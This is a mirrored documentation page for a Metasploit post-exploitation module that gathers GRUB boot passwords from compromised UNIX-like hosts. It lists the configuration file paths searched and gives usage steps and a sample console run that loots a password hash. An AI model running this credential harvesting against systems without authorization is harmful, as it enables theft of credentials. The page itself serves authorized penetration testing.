adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/post/multi/gather/grub_creds.md
T
Brent Cook 99ed2b7bf2 merge modules and documentation
2019-10-29 04:27:25 -05:00

91 lines
2.6 KiB
Markdown
Raw Blame History

# Gather GRUB Passwords
Reads all passwords from GRUB configuration files on UNIX-like machines.
## Vulnerable Application
Any UNIX-like system with a `shell` or `meterpreter` session using GRUB.
## Verification Steps
1. Get a `shell` or `meterpreter` session on some host.
2. Do: ```use post/multi/gather/grub_creds```
3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the
session number you wish to run this one.
4. Do: ```run```
5. If the system has readable GRUB configuration files containing a password,
they will be printed out.
## Options
**FILENAME**
A string that can be used to specify an additional file to check after the
usual places.
**VERBOSE**
A boolean that, when set, will provide more details on what is being checked.
_(Note: this option is defined elsewhere in metasploit, but this module can make
use of it.)_
## Scenarios
There are many places where a user might place the password that GRUB uses, so
inserting a password line into any of these locations will work without any
additional configuration:
```
/boot/grub/grub.conf
/boot/grub/grub.cfg
/boot/grub/menu.lst
/boot/grub2/grub.cfg
/boot/grub2/user.cfg
/etc/grub.conf
/etc/grub.d/*
/etc/grub/grub.cfg
/mnt/sysimage/boot/grub.conf
/mnt/boot/grub/grub.conf
/rpool/boot/grub/grub.cfg
```
Using a Metasploitable 2 VM (running Ubuntu 8.04), you can add the line
`password topscret` to `/boot/grub/menu.lst` to easily see this module in
action.
### Meterpreter
Typical run against Ubuntu 18.04 LTS
```
msf5 exploit(handler) > use post/multi/gather/grub_creds
msf5 post(grub_creds) > set SESSION 1
SESSION => 1
msf post(grub_creds) > run
[*] Searching for GRUB config files..
[*] Reading /boot/grub/grub.cfg
[*] Reading /etc/grub.d/40_custom
[*] Reading /etc/grub.d/00_header
[*] Reading /etc/grub.d/20_linux_xen
[*] Reading /etc/grub.d/10_linux
[*] Reading /etc/grub.d/README
[*] Reading /etc/grub.d/01_users
[+] /etc/grub.d/01_users saved to /home/bcook/.msf4/loot/20191029041304_default_127.0.0.1_grub.config_755243.txt
[*] Reading /etc/grub.d/41_custom
[*] Reading /etc/grub.d/30_os-prober
[*] Reading /etc/grub.d/05_debian_theme
[*] Reading /etc/grub.d/30_uefi-firmware
[+] Found credentials
Grub Credential Table
=====================
Username Password
-------- --------
putyourusernamehere grub.pbkdf2.sha512.10000.CB9E1ED1050D0AFBC6EC3B75413FB288AD255B960C6DBA31C00A03AC286847DF8B1DEE167ED54316FD62EEAFE4A617959F90249849FBCB562AC27E68A6D59F90.E6AB5AE4B5E4EF375218A620A798002F5B38EE5F31B549A66AF5533A7931419BAC30E2305A95113F60BE116C9F3FE22126FE7768D095DE6B9BCDC55632400B52
```
```
Reference in New Issue View Git Blame Copy Permalink